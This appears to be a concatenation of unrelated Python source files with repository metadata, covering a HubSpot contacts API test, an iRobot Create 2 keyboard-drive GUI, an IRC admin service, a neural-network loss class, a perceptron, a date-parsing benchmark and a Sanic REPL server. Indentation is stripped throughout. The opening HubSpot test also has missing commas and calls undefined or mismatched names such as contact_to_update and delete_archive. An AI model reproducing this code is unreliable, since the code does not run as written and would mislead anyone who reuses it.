# try and make it
created_contact = self.client.create_contact(dummy_contact)
# see if you made it
self.assertTrue(created_contact['vid'])
print "Created a contact: %s" % json.dumps(created_contact)
# if it was made, clean up
self.client.archive_contact(created_contact['vid'])
else:
self.fail("Was not able to create a contact: %s" % json.dumps(dummy_contact))
@attr('api')
def test_update_contact(self):
# make a contact to update
fake_info = json.dumps(dict(
email = 'old.email@thisisntreal.com',
firstname = 'Dumb',
lastname = 'Testman',
website = 'foobar.com',
company = 'Acme Inc',
phone = '1357111317'
address = '5678 Whatever street',
city = 'Pretendville',
state = 'Imaginationland',
zip = '31337'
))
created_contact = self.client.create_contact(fake_info)
# the contact's id number the test will try to update
contact_id_to_update = created_contact['vid']
# the information being updated in the contact
new_fake_info = json.dumps(dict(
email = 'new.email@thisisntreal.com',
firstname = 'Stupid',
lastname = 'Testguy',
website = 'thisisfake.org'
company = 'Pretend Incorporated',
phone = '0987654321',
address = '321 Sesame Street',
city = 'Atlantis',
state = 'Atlantic Ocean',
zip = '11235'
))
# try and update
update_response = self.client.update_client(contact_to_update, new_fake_info)
# make sure it worked
if update_response >= 400:
self.fail("Unable to update contact")
else:
print "Succesfully updated a contact"
# if it worked, clean up
self.client.archive_contact(contact_to_update)
@attr('api')
def test_archive_contact(self):
# make a contact to archive
fake_info = json.dumps(dict(
email = 'person@emailserver.com',
firstname = 'Scumbag',
lastname = 'Steve',
website = 'examplewebsite.edu',
company = 'Spatula City',
phone = '900014255',
address = '1600 Pensylvania ave',
city = 'Washington D.C.',
state = 'Not really sure',
zip = '43110'
))
created_contact = self.client.create_contact(fake_info)
# make sure it was actually created
self.assertTrue(created_contact['vid'])
# the id number of the contact being deleted
id_to_archive = created_contact['vid']
# try and archive
self.client.delete_archive(id_to_delete)
# look for the archived id
found_contacts = self.client.get_contact(id_to_archive)
# it should not have been returned
if len(found_contacts['contacts']) == 0:
print "The contact with id: %s was archived" % id_to_archive
else:
self.fail("Was not able to archive contact %s" % id_to_archive)
@attr('api')
def test_get_statistics(self):
# retrieve the statistics
returned_stats = self.client.get_statistics()
# make sure you got something
self.assertTrue(len(returned_statistics))
print "Got stats: %s" % json.dumps(returned_stats)
@attr('api')
def test_search(self):
# make a contact to search for
fake_info = json.dumps(dict(
email = 'notreal@examplecontact.com',
firstname = 'Troll',
lastname = 'Face',
website = 'www.blaghblaghblagh.com',
company = 'Initech',
phone = '1098765432',
address = '52 Last Avenue',
city = 'Leftraod',
state = 'Energy',
zip = '56473'
))
created_contact = self.client.create_contact(fake_info)
# make sure it was actually made
self.assertTrue(len(created_contact['vid']))
# what the test is searching for
search_this = 'Troll'
# do the search
returned_contacts = self.client.search(search_this)
# the search should return at least one contact
if len(returned_contacts['contacts']) == 0:
print "Didn't find anything by searching: %s" % search_this
else:
print "Found these contacts: %s" % json.dumps(returned_contacts)
if __name__ == "__main__":
unittest2.main()
|
[
"jpetr@hubspot.com"
] |
jpetr@hubspot.com
|
6a36669b8243e90144c2521c0c1d74ad42ac2682
|
0d2a02e4badf0c4f24060a709ac9a5f5fbf86796
|
/RobotDoge/Debug/Create2_TetheredDrive.py
|
dcca016820b36d93a738a13383a0dfa96b9772ef
|
[] |
no_license
|
tjwilder/Ice-Cream-Puppy
|
8923d7b07cdacd6d480d59852d2b8c76fffe8ee9
|
ede11679d296f5166defb06611400b7820230598
|
refs/heads/master
| 2021-05-29T19:57:14.940663
| 2015-10-25T15:58:41
| 2015-10-25T15:58:41
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 10,943
|
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# 27 May 2015
###########################################################################
# Copyright (c) 2015 iRobot Corporation
# http://www.irobot.com/
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in
# the documentation and/or other materials provided with the
# distribution.
#
# Neither the name of iRobot Corporation nor the names
# of its contributors may be used to endorse or promote products
# derived from this software without specific prior written
# permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
###########################################################################
from Tkinter import *
import tkMessageBox
import tkSimpleDialog
import struct
import sys, glob # for listing serial ports
import win32pipe
import win32file
try:
import serial
except ImportError:
tkMessageBox.showerror('Import error', 'Please install pyserial.')
raise
connection = None
TEXTWIDTH = 40 # window width, in characters
TEXTHEIGHT = 16 # window height, in lines
VELOCITYCHANGE = 200
ROTATIONCHANGE = 300
helpText = """\
Supported Keys:
P\tPassive
S\tSafe
F\tFull
C\tClean
D\tDock
R\tReset
Space\tBeep
Arrows\tMotion
If nothing happens after you connect, try pressing 'P' and then 'S' to get into safe mode.
"""
class TetheredDriveApp(Tk):
# static variables for keyboard callback -- I know, this is icky
callbackKeyUp = False
callbackKeyDown = False
callbackKeyLeft = False
callbackKeyRight = False
callbackKeyLastDriveCommand = ''
def __init__(self):
Tk.__init__(self)
self.title("iRobot Create 2 Tethered Drive")
self.option_add('*tearOff', FALSE)
self.menubar = Menu()
self.configure(menu=self.menubar)
createMenu = Menu(self.menubar, tearoff=False)
self.menubar.add_cascade(label="Create", menu=createMenu)
createMenu.add_command(label="Connect", command=self.onConnect)
createMenu.add_command(label="Help", command=self.onHelp)
createMenu.add_command(label="Quit", command=self.onQuit)
self.text = Text(self, height = TEXTHEIGHT, width = TEXTWIDTH, wrap = WORD)
self.scroll = Scrollbar(self, command=self.text.yview)
self.text.configure(yscrollcommand=self.scroll.set)
self.text.pack(side=LEFT, fill=BOTH, expand=True)
self.scroll.pack(side=RIGHT, fill=Y)
self.text.insert(END, helpText)
self.bind("<Key>", self.callbackKey)
self.bind("<KeyRelease>", self.callbackKey)
# sendCommandASCII takes a string of whitespace-separated, ASCII-encoded base 10 values to send
def sendCommandASCII(self, command):
cmd = ""
for v in command.split():
cmd += chr(int(v))
self.sendCommandRaw(cmd)
# sendCommandRaw takes a string interpreted as a byte array
def sendCommandRaw(self, command):
global connection
try:
if connection is not None:
connection.write(command)
else:
tkMessageBox.showerror('Not connected!', 'Not connected to a robot!')
print "Not connected."
except serial.SerialException:
print "Lost connection"
tkMessageBox.showinfo('Uh-oh', "Lost connection to the robot!")
connection = None
print ' '.join([ str(ord(c)) for c in command ])
self.text.insert(END, ' '.join([ str(ord(c)) for c in command ]))
self.text.insert(END, '\n')
self.text.see(END)
# getDecodedBytes returns a n-byte value decoded using a format string.
# Whether it blocks is based on how the connection was set up.
def getDecodedBytes(self, n, fmt):
global connection
try:
return struct.unpack(fmt, connection.read(n))[0]
except serial.SerialException:
print "Lost connection"
tkMessageBox.showinfo('Uh-oh', "Lost connection to the robot!")
connection = None
return None
except struct.error:
print "Got unexpected data from serial port."
return None
# get8Unsigned returns an 8-bit unsigned value.
def get8Unsigned(self):
return getDecodedBytes(1, "B")
# get8Signed returns an 8-bit signed value.
def get8Signed(self):
return getDecodedBytes(1, "b")
# get16Unsigned returns a 16-bit unsigned value.
def get16Unsigned(self):
return getDecodedBytes(2, ">H")
# get16Signed returns a 16-bit signed value.
def get16Signed(self):
return getDecodedBytes(2, ">h")
# A handler for keyboard events. Feel free to add more!
def callbackKey(self, event):
k = event.keysym.upper()
motionChange = False
if event.type == '2': # KeyPress; need to figure out how to get constant
if k == 'P': # Passive
self.sendCommandASCII('128')
elif k == 'S': # Safe
self.sendCommandASCII('131')
elif k == 'F': # Full
self.sendCommandASCII('132')
elif k == 'C': # Clean
self.sendCommandASCII('135')
elif k == 'D': # Dock
self.sendCommandASCII('143')
elif k == 'SPACE': # Beep
self.sendCommandASCII('140 3 1 64 16 141 3')
elif k == 'R': # Reset
self.sendCommandASCII('7')
elif k == 'UP':
self.callbackKeyUp = True
motionChange = True
elif k == 'DOWN':
self.callbackKeyDown = True
motionChange = True
elif k == 'LEFT':
self.callbackKeyLeft = True
motionChange = True
elif k == 'RIGHT':
self.callbackKeyRight = True
motionChange = True
else:
print repr(k), "not handled"
elif event.type == '3': # KeyRelease; need to figure out how to get constant
if k == 'UP':
self.callbackKeyUp = False
motionChange = True
elif k == 'DOWN':
self.callbackKeyDown = False
motionChange = True
elif k == 'LEFT':
self.callbackKeyLeft = False
motionChange = True
elif k == 'RIGHT':
self.callbackKeyRight = False
motionChange = True
if motionChange == True:
velocity = 0
velocity += VELOCITYCHANGE if self.callbackKeyUp is True else 0
velocity -= VELOCITYCHANGE if self.callbackKeyDown is True else 0
rotation = 0
rotation += ROTATIONCHANGE if self.callbackKeyLeft is True else 0
rotation -= ROTATIONCHANGE if self.callbackKeyRight is True else 0
# compute left and right wheel velocities
vr = velocity + (rotation/2)
vl = velocity - (rotation/2)
# create drive command
cmd = struct.pack(">Bhh", 145, vr, vl)
if cmd != self.callbackKeyLastDriveCommand:
self.sendCommandRaw(cmd)
self.callbackKeyLastDriveCommand = cmd
def onConnect(self):
global connection
if connection is not None:
tkMessageBox.showinfo('Oops', "You're already connected!")
return
try:
ports = self.getSerialPorts()
port = tkSimpleDialog.askstring('Port?', 'Enter COM port to open.\nAvailable options:\n' + '\n'.join(ports))
except EnvironmentError:
port = tkSimpleDialog.askstring('Port?', 'Enter COM port to open.')
if port is not None:
print "Trying " + str(port) + "... "
try:
connection = serial.Serial(port, baudrate=115200, timeout=1)
print "Connected!"
tkMessageBox.showinfo('Connected', "Connection succeeded!")
except:
print "Failed."
tkMessageBox.showinfo('Failed', "Sorry, couldn't connect to " + str(port))
def onHelp(self):
tkMessageBox.showinfo('Help', helpText)
def onQuit(self):
if tkMessageBox.askyesno('Really?', 'Are you sure you want to quit?'):
self.destroy()
def getSerialPorts(self):
"""Lists serial ports
From http://stackoverflow.com/questions/12090503/listing-available-com-ports-with-python
:raises EnvironmentError:
On unsupported or unknown platforms
:returns:
A list of available serial ports
"""
if sys.platform.startswith('win'):
ports = ['COM' + str(i + 1) for i in range(256)]
elif sys.platform.startswith('linux') or sys.platform.startswith('cygwin'):
# this is to exclude your current terminal "/dev/tty"
ports = glob.glob('/dev/tty[A-Za-z]*')
elif sys.platform.startswith('darwin'):
ports = glob.glob('/dev/tty.*')
else:
raise EnvironmentError('Unsupported platform')
result = []
for port in ports:
try:
s = serial.Serial(port)
s.close()
result.append(port)
except (OSError, serial.SerialException):
pass
return result
def setupServer():
fileHandle = win32file.CreateFile("c:\\temp\\puppy_pipe",
win32file.GENERIC_READ | win32file.GENERIC_WRITE,
0, None,
win32file.OPEN_EXISTING,
0, None)
data = win32file.ReadFile(fileHandle, 4096)
print data
if __name__ == "__main__":
setupServer()
app = TetheredDriveApp()
app.mainloop()
|
[
"tk100794@gmail.com"
] |
tk100794@gmail.com
|
cca0aa41f8a28e2f2a0634efb775b39109545a5d
|
7b579a4b0a4f0841650f18cfdec502dcd7b0b83c
|
/ircd/adminserv.py
|
cf2bf8657c43d98b241e1cfafe4c6ad17cf5df05
|
[] |
no_license
|
SpoonRocket/nameless-ircd
|
7d72d9970da1aa0aa1ff3ee5c3cf022b4dc3741e
|
d4c7877145103bdccf52e8297a9e130720486fab
|
refs/heads/master
| 2020-12-24T15:40:13.599225
| 2013-07-30T21:51:24
| 2013-07-30T21:51:24
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 11,299
|
py
|
from asynchat import async_chat
from asyncore import dispatcher
import os, socket, time
from nameless import services, util
locking_dict = util.locking_dict
class adminserv(services.Service):
def __init__(self,server,config={}):
services.Service.__init__(self,server,config=config)
self.nick = self.__class__.__name__
self.cmds = locking_dict({
'die':self.die,
'debug':self.toggle_debug,
'denerf':self.denerf_user,
'nerf':self.nerf_user,
'nerf_all':self.nerf_all,
'denerf_all':self.denerf_all,
'ping':self.set_ping,
'global':self.send_global,
'count':self.count,
'list':self.list,
'kill':self.kline,
'help':self.send_help,
'limit':self.limit,
'flood':self.set_flood_kill,
'?':self.send_help,
'link':self.link_server,
'delink':self.unlink_server,
'quiet':self.quiet_user,
'unquiet':self.unquiet_user,
'check':self.toggle_force_check
})
def handle_line(self,line):
class dummy:
def __init__(self):
self.nick = util.get_admin_hash_list()[0]
def privmsg(self,*args,**kwds):
pass
self.privmsg(dummy(),line)
@services.admin
def serve(self,server,user,line,resp_hook):
services.Service.serve(self,server,user,line,resp_hook)
def link_server(self,user,args,resp_hook):
"""
link to another server
link local $port
link i2p $i2pdest
link onion $onion
"""
if len(args) == 2:
type = args[0]
addr = args[1]
if type == 'local':
try:
addr = int(addr)
except:
resp_hook('local link requires port number only')
return
self.server.link.local_link(addr)
elif type == 'i2p':
self.server.link.i2p_link(addr)
elif type == 'onion':
self.server.link.tor_link(addr)
else:
resp_hook('bad link type: '+type)
else:
resp_hook('usage: link link_type link_address')
def unlink_server(self,user,args,resp_hook):
self.server.link.disconnect_all()
resp_hook('delinked all servers')
def toggle_force_check(self,user,args,resp_hook):
"""
toggle dropping of old s2s protocol
"""
self.server.force_check = not self.server.force_check
resp_hook('drop old = %s'%self.server.force_check)
def die(self,user,args,resp_hook):
"""
turn sever off
"""
reason = 'going offline'
if len(args) > 0:
reason = ' '.join(args)
self.server.stop(reason)
def limit(self,user,args,resp_hook):
"""
rate limit actions, meant to replace ``flood''
topic
topic setting ratelimiting
nick
nickname changing
privmsg#
private messages to # channels
privmsg&
private messages to & channels
join
channel joining
"""
resp = [ str(k) + ' : ' + str(v) for k,v in self.server.limits.items() ]
if len(args) > 0:
attr = args[0]
val = None
if len(args) > 1:
try:
val = int(args[1])
if val <= 0:
raise Exception()
except:
resp_hook('invlaid value: '+args[1])
return
if attr in self.server.limits:
if val is not None:
self.server.limits[attr] = val
resp = [attr + ' : ' + str(val)]
for line in resp:
resp_hook(line)
def send_help(self,user,args,resp_hook):
"""
show help message
"""
resp_hook('commands:')
for cmd, func in self.cmds.items():
resp_hook(cmd)
h = func.__doc__ or 'No Help'
for line in h.split('\n'):
resp_hook('-- '+line)
resp_hook(' ')
def toggle_debug(self,user,args,resp_hook):
"""
toggle server debug mode
"""
self.server.toggle_debug()
resp_hook('DEBUG: %s' % self.server.debug())
def quiet_user(self,user,args,resp_hook):
"""
set quiet
"""
for u in args:
if u in self.server.users:
u = self.server.users[u]
u.quiet = True
def unquiet_user(self,user,args,resp_hook):
"""
unset quiet
"""
for u in args:
if u in self.server.users:
u = self.server.users[u]
u.quiet = False
def nerf_user(self,user,args,resp_hook):
"""
set mode +P on one or more users
"""
for u in args:
if u in self.server.users:
u = self.server.users[u]
u.set_mode('+P')
u.lock_modes()
resp_hook('set mode +P on '+u.nick)
def denerf_user(self,user,args,resp_hook):
"""
unset mode +P on one or more users
"""
for u in args:
if u in self.server.users:
u = self.server.users[u]
u.unlock_modes()
u.set_mode('-P')
resp_hook('set mode -P on '+u.nick)
def nerf_all(self,user,args,resp_hook):
"""
set +P on every user
"""
self.server.send_global('Global +P Usermode Set')
for u in self.server.handlers:
u.set_mode('+P')
u.lock_modes()
resp_hook('GLOBAL +P')
def denerf_all(self,user,args,resp_hook):
"""
unset -P on every user
"""
self.server.send_global('Global -P Usermode Set')
for u in self.server.handlers:
u.unlock_modes()
u.set_mode('-P')
resp_hook('GLOBAL -P')
def set_ping(self,user,args,resp_hook):
"""
set ping timeout
"""
server = self.server
if len(args) == 1:
try:
old = server.pingtimeout
server.pingtimeout = int(args[0])
if server.pingtimeout < 10:
server.pingtimeout = 10
except:
resp_hook('not a number')
resp_hook('PING: '+str(server.pingtimeout)+' seconds')
def set_flood_kill(self,user,args,resp_hook):
"""
set flood settings
kill
toggle kill on flood
interval [float]
flood interval in seconds
bpi [integer]
bytes per interval
lpi [integer]
lines per interval
"""
resp = [
'kill: '+str(self.server.flood_kill),
'interval: '+str(self.server.flood_interval) ,
'bpi: '+str(self.server.flood_bpi),
'lpi: '+str(self.server.flood_lpi)
]
if len(args) > 0:
attr = args[0]
val = None
if len(args) > 1:
try:
val = float(args[1])
if val <= 0:
raise Exception()
except:
resp_hook('invlaid value: '+args[1])
return
if attr == 'bpi':
if val is not None:
self.server.flood_bpi = val
resp = ['bpi: '+str(self.server.flood_bpi)]
elif attr == 'lpi':
if val is not None:
self.server.flood_lpi = val
resp = ['lpi: '+str(self.server.flood_lpi)]
elif attr == 'interval':
if val is not None:
self.server.flood_interval = val
resp = ['interval: '+str(self.server.flood_interval)]
elif attr == 'kill':
self.server.flood_kill = not self.server.flood_kill
resp = ['kill: '+str(self.server.flood_kill)]
for line in resp:
resp_hook(line)
def send_global(self,user,args,resp_hook):
"""
send global message to all users
"""
msg = ' '.join(args)
self.server.send_global(msg)
resp_hook('GLOBAL: %s'%msg)
def count(self,user,args,resp_hook):
"""
count server objects
users
count users
chans
count channels
"""
if len(args) > 0:
for targ in args:
i = []
targ = targ.lower()
if len(targ) == 0:
continue
elif targ == 'users':
i = self.server.users.values()
elif targ == 'chans':
i = self.server.chans.values()
resp_hook(str(len(i))+' '+targ+'s')
else:
resp_hook('Usage: COUNT [user|chan]')
# still useful for debugging
# undeprecated for now
# adding more functionality
#@services.deprecated
def list(self,user,args,resp_hook):
"""
list server objects
users
list users
chans
list channels
chan:&chan
chan:#chan
list users in channel
user:nickname
list channels user is in
links
list server links
"""
if len(args) > 0:
for targ in args:
i = []
targ = targ.lower()
if len(targ) == 0:
continue
elif targ == 'links':
i = self.server.link.links
elif targ == 'users':
i = self.server.users
elif targ == 'chans':
i = self.server.chans
elif targ.count(':') > 0:
ind = targ.index(':')
t2,t1 = targ[ind+1:], targ[:ind]
if t1 == 'chan':
# list users in channel as seen by server
i = t2 in self.server.chans and self.server.chans[t2].users or []
targ = t1 + ' has user'
elif t1 == 'user':
# list channels user is in as seen by server
i = t2 in self.server.users and self.server.users[t2].chans or []
targ = t1 + ' in channel'
for obj in i:
resp_hook(targ+': '+str(obj))
else:
resp_hook('Usage: LIST [user|chan]')
def kline(self,user,args,resp_hook):
"""
kill one or more user's connections
"""
for u in args:
if u not in self.server.users:
resp_hook('NO USER: '+str(u))
continue
u = self.server.users[u]
u.kill('kline')
resp_hook('KILLED '+str(u))
|
[
"ampernand@gmail.com"
] |
ampernand@gmail.com
|
dbfa4c587a9c4313aa29f64ec78cbe79f67f35f5
|
3c4c57a0feea3eb30ade51553153dd30d47581b0
|
/basics/classes/learning_class.py
|
46e946e1a660b82ef8dca71416df6b4b5c13616f
|
[] |
no_license
|
ShivSoni5/Python-Practice
|
e165824d829a791503eb3957f8e93cd3230d0b57
|
769b0f4898fcf8de52122045571aa31e678b4e9f
|
refs/heads/master
| 2021-10-14T16:05:46.474990
| 2019-02-05T04:48:03
| 2019-02-05T04:48:03
| 101,506,952
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 694
|
py
|
#!/usr/bin/python3
class about_me:
#__init__ is just like constructors in C++
def __init__(self,name,college,year):
self.name = name #these three are instances
self.college = college
self.year = year
def my_name(self):
print("Hello, my name is", self.name)
def clg_name(self):
print("I am in",self.college,"college")
def cur_year(self):
print("I read in",self.year,"year")
branch = "CSE" #this is class variable
A = about_me("Shiv Soni","JECRC","3rd")
"""
A.my_name()
A.clg_name()
A.cur_year()
"""
print(A.year)
print(A.college)
print(A.name)
print(A.branch)
print(about_me.branch) #class variable can be accessed using class name also
|
[
"shivsonic05@gmail.com"
] |
shivsonic05@gmail.com
|
07a04f5bbce51d5e87bb50681fe02389393bd786
|
df6606f995b3e81d5f95fdc0abdc8eec09893df5
|
/outlier_pooling/losses/cross_entropy_loss.py
|
adb0df7491d9edce852a5fff2155befad9c03153
|
[] |
no_license
|
wakamori-k/cren
|
321f16073c506423ba329bbc2121cfe0d5aadeae
|
1ccf1d0a36b0ecbce41f11875d9b4193fff4d3f4
|
refs/heads/master
| 2023-03-04T01:39:33.060006
| 2021-02-16T18:16:40
| 2021-02-16T18:16:40
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 442
|
py
|
from utils import seed_torch
import torch
seed_torch()
from .base_loss import BaseLoss
class CrossEntropyLoss(BaseLoss):
def __init__(self, **kwargs):
assert kwargs['train_type'] == 'classification', "Cross Entropy Loss can only be used for classification."
super().__init__()
self.criterion = torch.nn.CrossEntropyLoss()
def forward(self, outputs, labels):
return self.criterion(outputs, labels)
|
[
"noreply@github.com"
] |
wakamori-k.noreply@github.com
|
0d93d68b19810b8e89749bc128fd79b93304d5e0
|
bcca0627e186697f83065535d5fcaac3ede739c7
|
/mlp/MultiLayerPerceptron.py
|
c1c3341d38d18a5391fea53cf10de5ab9481c73e
|
[] |
no_license
|
owinogradow/soft-computing
|
60d088a1064b3dc74eb95657c970989ec4904541
|
c207d67efec7fb10b02fa94341972202700974e1
|
refs/heads/master
| 2022-12-26T01:15:15.199828
| 2020-10-02T12:27:50
| 2020-10-02T12:27:50
| 300,597,032
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,806
|
py
|
from InputNeuron import InputNeuron
from Neuron import Neuron
import random
import numpy as np
class MultiLayerPerceptron:
def __init__(self, inputLayerSize, hiddenLayersSize, outputLayerSize, epochs, learningStep=0.5, biasNeuron=False):
self.learningStep = learningStep
self.bias = biasNeuron
if biasNeuron:
self.biasNeuron = InputNeuron(1)
self.inputLayer = [ InputNeuron() for _ in range(inputLayerSize) ]
self.hiddenLayers = []
# populate first hidden layer
self.hiddenLayers.append( [ Neuron(inputLayerSize + int(self.bias)) for _ in range(hiddenLayersSize.pop(0)) ] )
# we allow to pass multiple hidden layers
for idx, hiddenLayerSize in enumerate(hiddenLayersSize):
self.hiddenLayers.append( [ Neuron(len(self.hiddenLayers[idx]) + int(self.bias)) for _ in range(hiddenLayerSize) ] )
self.outputLayer = [ Neuron(len(self.hiddenLayers[-1]) + int(self.bias)) for _ in range(outputLayerSize) ]
self.layers = [ self.inputLayer, *self.hiddenLayers, self.outputLayer ]
self.epochs = epochs
def calculateNetworkOutput(self, tp):
# initialize input neurons
for inputNeuron, inpt in zip(self.inputLayer, tp.inputs):
inputNeuron.output = inpt
# calculate output values for layers
# omit input layer, no need to calc outputs there
for idx, layer in enumerate(self.layers[1:]):
for neuron in layer:
inputs = [ neuron.output for neuron in self.layers[idx] ]
if self.bias:
inputs.append(self.biasNeuron.output)
neuron.calcOutput( inputs )
if self.bias:
outputs = []
outputs.append([ neuron.output for neuron in self.layers[-1] ])
for hiddenLayer in self.hiddenLayers[::-1]:
outputs.append([ neuron.output for neuron in hiddenLayer ])
return outputs
else:
return [ neuron.output for neuron in self.layers[-1] ]
def train(self, trainingPatterns):
random.shuffle(trainingPatterns)
for epoch in range(self.epochs):
for tp in trainingPatterns:
self.calculateNetworkOutput(tp)
# calculate error signal for the output layer
for neuron, output in zip(self.layers[-1], tp.outputs):
neuron.calcErrorSignal(tpOutput=output)
# calculate error signals for layers from last but one
for idx, layer in enumerate(self.layers[-2:0:-1]):
for neuronIdx, neuron in enumerate(layer):
weightedSum = np.dot(
a=[ neuronInNextLayer.weights[neuronIdx] for neuronInNextLayer in self.layers[-idx-1] ],
b=[ neuronInNextLayer.errorSignal for neuronInNextLayer in self.layers[-idx-1] ])
neuron.calcErrorSignal(weightedSumErrorSig=weightedSum)
# adjust weights
for layerIdx, layer in enumerate(self.layers[1:]):
for neuron in layer:
if self.bias:
for weightIdx, weight in enumerate(neuron.weights[:-1]):
neuron.weights[weightIdx] += self.learningStep * neuron.errorSignal * self.layers[layerIdx][weightIdx].output
neuron.weights[-1] += self.learningStep * neuron.errorSignal * self.biasNeuron.output
else:
for weightIdx, weight in enumerate(neuron.weights):
neuron.weights[weightIdx] += self.learningStep * neuron.errorSignal * self.layers[layerIdx][weightIdx].output
|
[
"ol.winogradow@gmail.com"
] |
ol.winogradow@gmail.com
|
3e80e221a43c5ad66d7a3988f1c9082f2936aca6
|
2b0bd3847f0a5a1823d2f72ecee0ce7069102dd4
|
/benchmark/benchmark_parsing.py
|
8db4bbeee35b794b150c7869ab9f64ffee31b1d8
|
[
"MIT"
] |
permissive
|
stestagg/dateformat
|
d7c7767cd1c90b92a192e1b420bee8340bb8b068
|
3a99e891e586d73fafca85b4c591966ebbc89b36
|
refs/heads/master
| 2022-12-06T23:55:38.851452
| 2022-11-17T11:30:00
| 2022-11-17T11:30:00
| 113,165,866
| 12
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,634
|
py
|
from collections import defaultdict
import random
import time
import datetime
import dateformat
import arrow
import iso8601
import ciso8601
import dateutil.parser
import dateparser
def make_list_of_dates(n=1e4):
dates = []
for i in range(int(n)):
timestamp = random.random() * (time.time() * 2)
dates.append(datetime.datetime.utcfromtimestamp(timestamp))
return dates
def format_date_list(dates):
format = dateformat.DateFormat("YYYY-MM-DD hh:mm:ss")
return [format.format(date) for date in dates]
def benchmark(fn, values):
before = time.clock()
fn(values)
after = time.clock()
taken = (after - before) * 1000
fn_name = fn.__name__.replace("parse_", "")
return (after - before) * 1000
def parse_dateformat(dates):
format = dateformat.DateFormat("YYYY-MM-DD hh:mm:ss")
for date in dates:
assert isinstance(format.parse(date), datetime.datetime)
def parse_strptime(dates):
for date in dates:
assert isinstance(datetime.datetime.strptime(date, "%Y-%m-%d %H:%M:%S"), datetime.datetime)
def parse_dateutil(dates):
for date in dates:
assert isinstance(dateutil.parser.parse(date), datetime.datetime)
def parse_dateparser(dates):
for date in dates:
assert isinstance(dateparser.parse(date), datetime.datetime)
def parse_dateparser_guided(dates):
for date in dates:
assert isinstance(dateparser.parse(date, date_formats=['%Y-%m-%d %H:%M:%S']), datetime.datetime)
def parse_iso8601(dates):
for date in dates:
assert isinstance(iso8601.parse_date(date), datetime.datetime)
def parse_ciso8601(dates):
for date in dates:
assert isinstance(ciso8601.parse_datetime(date), datetime.datetime)
def parse_arrow(dates):
for date in dates:
assert isinstance(arrow.get(date, "YYYY-MM-DD hh:mm:ss"), arrow.Arrow)
def main():
dates = make_list_of_dates()
date_strings = format_date_list(dates)
fns = [
parse_dateformat,
parse_strptime,
parse_dateutil,
parse_arrow,
parse_dateparser,
parse_dateparser_guided,
parse_iso8601,
parse_ciso8601
]
# fns = [
# parse_dateformat,
# ]
timings = defaultdict(list)
for i in range(3):
random.shuffle(fns)
for fn in fns:
timings[fn].append(benchmark(fn, date_strings))
print("method,time_ms")
for fn, times in timings.items():
fastest = min(times)
fn_name = fn.__name__.replace("parse_", "")
print(f"{fn_name},{fastest}")
if __name__ == '__main__':
main()
|
[
"stephenstagg@Stephens-MacBook-Pro.local"
] |
stephenstagg@Stephens-MacBook-Pro.local
|
e91913141254ccbf8026f7e621212cbf03a9054f
|
5f6e26fabdec868a3d4851de827054ca58d1c2af
|
/server/src/web_app/app.py
|
6493854d5fd3961bd3967d905aa002e25db1e172
|
[] |
no_license
|
abingham/runner_repl
|
fd2a1187db27cca4f5971d1f846a68b091a33199
|
e498739a34f289c40a4cdfcc7675c94e1fb18ebc
|
refs/heads/master
| 2021-05-02T10:40:06.632053
| 2018-03-09T08:46:29
| 2018-03-09T08:46:29
| 120,760,922
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,893
|
py
|
"""Create an run the aiohttp Application.
"""
import aiohttp
import docker
import docker.errors
from sanic import Sanic
import sanic.exceptions
from .handlers import Handler
from .logging import logging_config
def _configure_routes(app, repl_port, image_name, network_name):
"Add routes to the application."
handler = Handler(image_name=image_name,
network_name=network_name,
repl_port=repl_port)
app.add_route(handler.create_repl_handler,
'/repl/<kata>/<animal>',
methods=['POST'])
app.add_route(handler.delete_repl_handler,
'/repl/<kata>/<animal>',
methods=['DELETE'])
app.add_websocket_route(handler.websocket_handler, '/repl/<kata>/<animal>')
app.listener('after_server_stop')(
lambda app, loop: handler.close())
def create_app(repl_port, network_name, image_name, log_level):
"""Construct an Application instance.
It will be configured with middleware and startup/shutdown handlers.
"""
app = Sanic(log_config=logging_config(log_level))
@app.listener('before_server_start')
async def startup(app, loop):
app.config.docker_client = docker.from_env()
app.config.http_session = aiohttp.ClientSession()
@app.listener('after_server_stop')
async def cleanup(app, loop):
await app.config.http_session.close()
@app.exception(docker.errors.NotFound)
def translate_not_found(request, exception):
raise sanic.exceptions.NotFound(
message=str(exception))
@app.exception(docker.errors.APIError)
def translate_api_error(request, exception):
raise sanic.exceptions.SanicException(
message=str(exception),
status_code=exception.status_code)
_configure_routes(app, repl_port, image_name, network_name)
return app
|
[
"austin.bingham@gmail.com"
] |
austin.bingham@gmail.com
|
4671e43342e0179795ecbef9138be7fb1df261e3
|
57885bbb4f2005a9caac065f59fb7bb59f21d708
|
/Week_9/finance/register/test_register.py
|
5ad6596fb1805cd789a63decff3f8768a132784b
|
[] |
no_license
|
sprdave/CS50-2021
|
af9922edbe07ea4d1e01abc7fde6c708c868e904
|
4386382492200942a4982b74d1a5c8836499c8b4
